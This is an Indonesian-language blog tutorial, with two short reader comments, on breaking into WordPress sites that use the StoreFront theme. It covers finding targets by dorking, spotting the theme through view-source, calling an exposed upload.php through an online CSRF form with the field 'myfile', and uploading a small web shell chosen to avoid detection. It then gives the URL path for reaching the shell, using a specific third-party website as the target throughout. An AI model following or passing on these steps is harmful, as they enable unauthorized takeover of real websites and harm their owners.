Dork : Crotz Disini
Exploiter Online : Crotz Disana
Kita anggap kalian sudah dorking menggunakan dork diatas, Dorking nya dengan cara dorking image
Kita klik salah satu target lalu klik kanan - open image in new tab ( Lihat Gambar )
Kemudian akan muncul seperti ini
Kita hilangkan url dibelakang www.roponesparabautizo.com
awalnya www.roponesparabautizo.com/wp-content/uploads/products_img/face_the_fuzz_2.jpg
lalu kita buat menjadi seperti ini www.roponesparabautizo.com kemudian klik enter dan akan keluar seperti ini
Kemudian kita harus mengetahui theme apa yang digunakan web tersebut dengan cara tambahkan view-source: didepan url menjadi
view-source:ww.roponesparabautizo.com
Maka akan menjadi seperti ini ( yang saya blok adalah theme yang dipakai )
Disini kita mengetahui kalau theme yang digunakan adalah WP Theme Store
Gimana caranya ? itu kan yang saya blog ada tulisan http://www.roponesparabautizo.com/wp-content/themes/StoreFront ( StoreFront adalah tema yang didgunakan )
Nah sekarang kita sudah tau theme nya, jadi kita harus menuju ke direktori theme nya
contoh http://www.roponesparabautizo.com/wp-content/themes/StoreFront/
Lalu kita masukkan exploitnya yaitu tambahkan exploit nya
Sehingga akan menjadi
http://www.roponesparabautizo.com/wp-content/themes/StoreFront/upload/upload.php
Lihat gambar ( Vuln = Blank )
Ini contoh website yang vuln ketika diexploit
Kemudian kita buka csrf online milik Tuan2Fay ( sudah saya berikan diatas ) atau bisa juga Crotz Disana
Masukkan web beserta exploitnya tadi ( http://www.roponesparabautizo.com/wp-content/themes/StoreFront/upload/upload.php )
Postname masukkan myfile dan klik ok
Maka akan muncul seperti ini
Klik Choose File dan pilih shell anda kemudian klik upload
Usahakan pakai mini shell karena shell yang biasanya seperti indoxploit, xai shell, gsh shell, dan shell besar lain akan terseteksi sebagai ancaman
Bisa pakai mini shell yang di Sini
Maka akan keluar laman blank
Langsung saja akses shell nya
Tempat akses shell : site.com/wp-content/uploads/products_img/namashell.php
Contoh :
http://www.roponesparabautizo.com/wp-content/uploads/products_img/namashell.php
Kalau ada yang mau ditanyakan chat aja ya di fanspage kami di Sini
Naisehh kuuyy :v
BalasHapusty fay :*
Hapus